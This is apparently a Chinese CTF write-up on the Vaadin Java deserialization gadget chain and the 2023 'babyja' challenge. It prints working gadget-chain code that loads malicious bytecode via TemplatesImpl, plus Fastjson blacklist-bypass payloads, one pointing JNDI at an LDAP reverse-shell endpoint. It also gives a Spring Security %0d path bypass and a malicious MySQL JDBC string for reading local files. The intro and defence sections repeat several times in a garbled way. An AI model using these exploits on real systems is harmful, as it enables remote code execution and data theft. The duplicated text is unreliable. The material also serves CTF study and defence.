Java安全：从CTF中学习Vaadin反序列化链利用<\/h1>

前言<\/h2>
本文详细分析Vaadin框架中的反序列化漏洞利用链，并结合2023年福建省赛黑盾杯初赛"babyja"题目进行实战演示。主要内容包括Vaadin反序列化链原理、相关类分析、利用方法以及CTF题目中的综合应用。<\/p>

Vaadin反序列化链概述<\/h2>
Vaadin是一个用于构建Web应用程序的Java框架。其反序列化链的核心是利用反射调用getter方法，通过特定类的组合实现任意代码执行。<\/p>

关键依赖<\/h3>

vaadin-server: 7.7.14<\/li>

vaadin-shared: 7.7.14<\/li> <\/ul>

关键类分析<\/h2>

1. NestedMethodProperty类<\/h3>

com.vaadin.data.util.NestedMethodProperty<\/code>类是一个封装属性方法的类，其核心功能如下：<\/p>

构造方法<\/strong>：<\/p>

public<\/span> NestedMethodProperty<\/span>(<\/span>Object instance,<\/span> String propertyName)<\/span>
<\/span><\/span><\/code><\/pre>接收两个参数：<\/p>

实例化对象<\/li>
属性值<\/li>
<\/ol>
初始化过程<\/strong>：<\/p>

调用initialize()<\/code>方法获取实例类中的相关信息<\/li>
获取传入属性值的getter方法<\/li>
将方法信息存储在成员变量中<\/li>
<\/ol>
关键方法 - getValue()<\/strong>：<\/p>
public<\/span> Object getValue<\/span>()<\/span>
<\/span><\/span><\/code><\/pre>
遍历封装的getMethods<\/code>数组<\/li>
调用其中属性的方法名<\/li>
可用于触发TemplatesImpl的利用方式<\/li>
<\/ul>
2. PropertysetItem类<\/h3>
com.vaadin.data.util.PropertysetItem<\/code>是实现反序列化链的关键触发类：<\/p>
特性<\/strong>：<\/p>

实现了多个接口<\/li>
初始化后能对map和list属性进行操作<\/li>
数据存储在成员变量map<\/code>中<\/li>
<\/ul>
关键方法<\/strong>：<\/p>

getItemProperty()<\/code>：从map中获取属性值<\/li>
toString()<\/code>：从list中获取值并调用getValue()<\/code><\/li>
addItemProperty()<\/code>：向list和map中添加属性<\/li>
<\/ol>
利用逻辑<\/strong>：<\/p>

通过addItemProperty()<\/code>设置list和map内容<\/li>
toString()<\/code>方法从list获取id<\/li>
从map中获取对应值并调用getValue()<\/code><\/li>
<\/ol>
完整利用链构建<\/h2>
利用链的核心思路：<\/p>

使用BadAttributeValueExpException<\/code>触发任意类的toString()<\/code>方法<\/li>
PropertysetItem.toString()<\/code>触发getValue()<\/code>调用<\/li>
NestedMethodProperty.getValue()<\/code>反射调用getter方法<\/li>
结合TemplatesImpl<\/code>实现代码执行<\/li>
<\/ol>
利用代码示例<\/h3>
import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;<\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;<\/span>
<\/span><\/span>import<\/span> com.vaadin.data.util.NestedMethodProperty;<\/span>
<\/span><\/span>import<\/span> com.vaadin.data.util.PropertysetItem;<\/span>
<\/span><\/span>import<\/span> javax.management.BadAttributeValueExpException;<\/span>
<\/span><\/span>import<\/span> java.io.*;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span>
<\/span><\/span>import<\/span> java.nio.file.Files;<\/span>
<\/span><\/span>import<\/span> java.nio.file.Paths;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Vaadin_Ser<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> serialize<\/span>(<\/span>Object obj)<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>        ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"ser.bin"<\/span>));<\/span>
<\/span><\/span>        oos.<\/span>writeObject<\/span>(<\/span>obj);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> Object unserialize<\/span>(<\/span>String Filename)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>        ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>Filename));<\/span>
<\/span><\/span>        return<\/span> ois.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> setFieldValue<\/span>(<\/span>Object obj,<\/span> String fieldName,<\/span> Object value)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Field field =<\/span> obj.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>fieldName);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        field.<\/span>set<\/span>(<\/span>obj,<\/span> value);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        \/\/ 生成包含恶意类字节码的TemplatesImpl类
<\/span><\/span><\/span><\/span>        byte<\/span>[]<\/span> payloads =<\/span> Files.<\/span>readAllBytes<\/span>(<\/span>Paths.<\/span>get<\/span>(<\/span>"Calc_Ab.class"<\/span>));<\/span>
<\/span><\/span>        TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>        setFieldValue(<\/span>templates,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]{<\/span>payloads});<\/span>
<\/span><\/span>        setFieldValue(<\/span>templates,<\/span> "_name"<\/span>,<\/span> "zjacky"<\/span>);<\/span>
<\/span><\/span>        setFieldValue(<\/span>templates,<\/span> "_tfactory"<\/span>,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 构建PropertysetItem和NestedMethodProperty
<\/span><\/span><\/span><\/span>        PropertysetItem pItem =<\/span> new<\/span> PropertysetItem();<\/span>
<\/span><\/span>        NestedMethodProperty nmprop =<\/span> new<\/span> NestedMethodProperty(<\/span>templates,<\/span> "outputProperties"<\/span>);<\/span>
<\/span><\/span>        pItem.<\/span>addItemProperty<\/span>(<\/span>"outputProperties"<\/span>,<\/span> nmprop);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 实例化BadAttributeValueExpException并反射写入
<\/span><\/span><\/span><\/span>        BadAttributeValueExpException exception =<\/span> new<\/span> BadAttributeValueExpException(<\/span>"zjacky"<\/span>);<\/span>
<\/span><\/span>        Field field =<\/span> BadAttributeValueExpException.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"val"<\/span>);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        field.<\/span>set<\/span>(<\/span>exception,<\/span> pItem);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 序列化或反序列化
<\/span><\/span><\/span><\/span>        serialize(<\/span>exception);<\/span>
<\/span><\/span>        \/\/ unserialize("ser.bin");
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>CTF实战分析：2023闽盾杯初赛babyja<\/h2>
题目分析<\/h3>
环境特点<\/strong>：<\/p>

Fastjson黑名单绕过或不出网应用<\/li>
Spring Security权限绕过<\/li>
Vaadin反序列化链<\/li>
C3P0二次反序列化<\/li>
<\/ol>
目录结构<\/strong>：<\/p>

关键组件在pom.xml中明确：

Fastjson<\/li>
Spring Security 5.6.3<\/li>
Vaadin<\/li>
C3P0<\/li>
<\/ul>
<\/li>
<\/ul>
漏洞利用路径<\/h3>
1. Spring Security权限绕过<\/h4>
漏洞点<\/strong>：<\/p>

使用regexMatchers<\/code>进行路径匹配<\/li>
Spring Security 5.6.3存在设计问题<\/li>
<\/ul>
绕过方法<\/strong>：<\/p>

使用%0d<\/code>绕过路径检查<\/li>
示例：访问\/admin\/user%0d<\/code><\/li>
<\/ul>
2. Fastjson利用<\/h4>
黑名单绕过技术<\/strong>：<\/p>

Unicode编码绕过<\/li>
16进制编码绕过<\/li>
<\/ol>
利用方式<\/strong>：<\/p>
方式一：JNDI注入（出网）<\/strong><\/p>
{
<\/span><\/span>    "@type"<\/span>: "\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c"<\/span>,
<\/span><\/span>    "dataSourceName"<\/span>: "ldap:\/\/xxx:1389\/Basic\/ReverseShell\/xxx\/7979"<\/span>,
<\/span><\/span>    "autoCommit"<\/span>: true<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>方式二：C3P0 JNDI注入<\/strong><\/p>
{
<\/span><\/span>    "@type"<\/span>: "com.mchange.v2.c3p0.\u004a\u006e\u0064\u0069\u0052\u0065\u0066\u0043\u006f\u006e\u006e\u0065\u0063\u0074\u0069\u006f\u006e\u0050\u006f\u006f\u006c\u0044\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065"<\/span>,
<\/span><\/span>    "\u004a\u006e\u0064\u0069\u004e\u0061\u006d\u0065"<\/span>: "ldap:\/\/127.0.0.1:1389\/Basic\/Command\/calc"<\/span>,
<\/span><\/span>    "LoginTimeout"<\/span>: 0<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3. 不出网情况下的利用<\/h4>
利用链<\/strong>：

C3P0 → 二次反序列化 → Vaadin链<\/p>
限制<\/strong>：<\/p>

TemplatesImpl的16进制被ban<\/li>
无法直接使用TemplatesImpl加载字节码<\/li>
<\/ul>
替代方案<\/strong>：

利用题目中的bean<\/code>目录下的MyBean<\/code>类，该类有getConnection()<\/code>方法，可以：<\/p>

通过Vaadin链调用getConnection()<\/code><\/li>
控制JDBC连接恶意MySQL服务器<\/li>
读取flag文件<\/li>
<\/ol>
利用代码<\/strong>：<\/p>
import<\/span> com.ctf.bean.MyBean;<\/span>
<\/span><\/span>import<\/span> com.vaadin.data.util.NestedMethodProperty;<\/span>
<\/span><\/span>import<\/span> com.vaadin.data.util.PropertysetItem;<\/span>
<\/span><\/span>import<\/span> javax.management.BadAttributeValueExpException;<\/span>
<\/span><\/span>import<\/span> java.io.*;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Vaadin_Ser<\/span> {<\/span>
<\/span><\/span>    \/\/ ...（省略序列化方法）
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        MyBean myBean =<\/span> new<\/span> MyBean();<\/span>
<\/span><\/span>        myBean.<\/span>setDatabase<\/span>(<\/span>"mysql:\/\/xxx:3306\/test?user=fileread_file:\/\/\/flag.txt&ALLOWLOADLOCALINFILE=true&maxAllowedPacket=65536&allowUrlInLocalInfile=true#"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        PropertysetItem pItem =<\/span> new<\/span> PropertysetItem();<\/span>
<\/span><\/span>        NestedMethodProperty nmprop =<\/span> new<\/span> NestedMethodProperty(<\/span>myBean,<\/span> "Connection"<\/span>);<\/span>
<\/span><\/span>        pItem.<\/span>addItemProperty<\/span>(<\/span>"Connection"<\/span>,<\/span> nmprop);<\/span>
<\/span><\/span>        
<\/span><\/span>        BadAttributeValueExpException exception =<\/span> new<\/span> BadAttributeValueExpException(<\/span>"zjacky"<\/span>);<\/span>
<\/span><\/span>        Field field =<\/span> BadAttributeValueExpException.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"val"<\/span>);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        field.<\/span>set<\/span>(<\/span>exception,<\/span> pItem);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 输出HEX序列化结果
<\/span><\/span><\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>bytesToHexString(<\/span>ser(<\/span>exception)));<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>MySQL连接字符串关键参数<\/strong>：<\/p>
mysql:\/\/1.1.1.1:3306\/test?
user=fileread_file:\/\/\/flag.txt
&ALLOWLOADLOCALINFILE=true
&maxAllowedPacket=65536
&allowUrlInLocalInfile=true#
<\/code><\/pre>
总结<\/h2>

Vaadin反序列化链核心是利用BadAttributeValueExpException<\/code>触发toString()<\/code>，通过PropertysetItem<\/code>和NestedMethodProperty<\/code>反射调用getter方法<\/li>
在CTF中常结合Fastjson、Spring Security等其他漏洞综合利用<\/li>
不出网环境下可通过二次反序列化或JDBC连接等方式实现利用<\/li>
注意包名和类名的正确性对利用成功至关重要<\/li>
<\/ol>
防御建议<\/h2>

升级Vaadin到安全版本<\/li>
对反序列化操作进行严格限制<\/li>
完善Fastjson的黑名单<\/li>
及时更新Spring Security等组件<\/li>
对JDBC连接等敏感操作进行参数过滤<\/li>
<\/ol>

Java安全：从CTF中学习Vaadin反序列化链利用<\/h1>

前言<\/h2> 本文详细分析Vaadin框架中的反序列化漏洞利用链，并结合2023年福建省赛黑盾杯初赛"babyja"题目进行实战演示。主要内容包括Vaadin反序列化链原理、相关类分析、利用方法以及CTF题目中的综合应用。<\/p>

Vaadin反序列化链概述<\/h2> Vaadin是一个用于构建Web应用程序的Java框架。其反序列化链的核心是利用反射调用getter方法，通过特定类的组合实现任意代码执行。<\/p>

关键类分析<\/h2>

CTF实战分析：2023闽盾杯初赛babyja<\/h2>

漏洞利用路径<\/h3>

防御建议<\/h2> 升级Vaadin到安全版本<\/li> 对反序列化操作进行严格限制<\/li> 完善Fastjson的黑名单<\/li> 及时更新Spring Security等组件<\/li> 对JDBC连接等敏感操作进行参数过滤<\/li> <\/ol>

前言<\/h2>
本文详细分析Vaadin框架中的反序列化漏洞利用链，并结合2023年福建省赛黑盾杯初赛"babyja"题目进行实战演示。主要内容包括Vaadin反序列化链原理、相关类分析、利用方法以及CTF题目中的综合应用。<\/p>

Vaadin反序列化链概述<\/h2>
Vaadin是一个用于构建Web应用程序的Java框架。其反序列化链的核心是利用反射调用getter方法，通过特定类的组合实现任意代码执行。<\/p>

防御建议<\/h2>

升级Vaadin到安全版本<\/li>
对反序列化操作进行严格限制<\/li>
完善Fastjson的黑名单<\/li>
及时更新Spring Security等组件<\/li>
对JDBC连接等敏感操作进行参数过滤<\/li> <\/ol>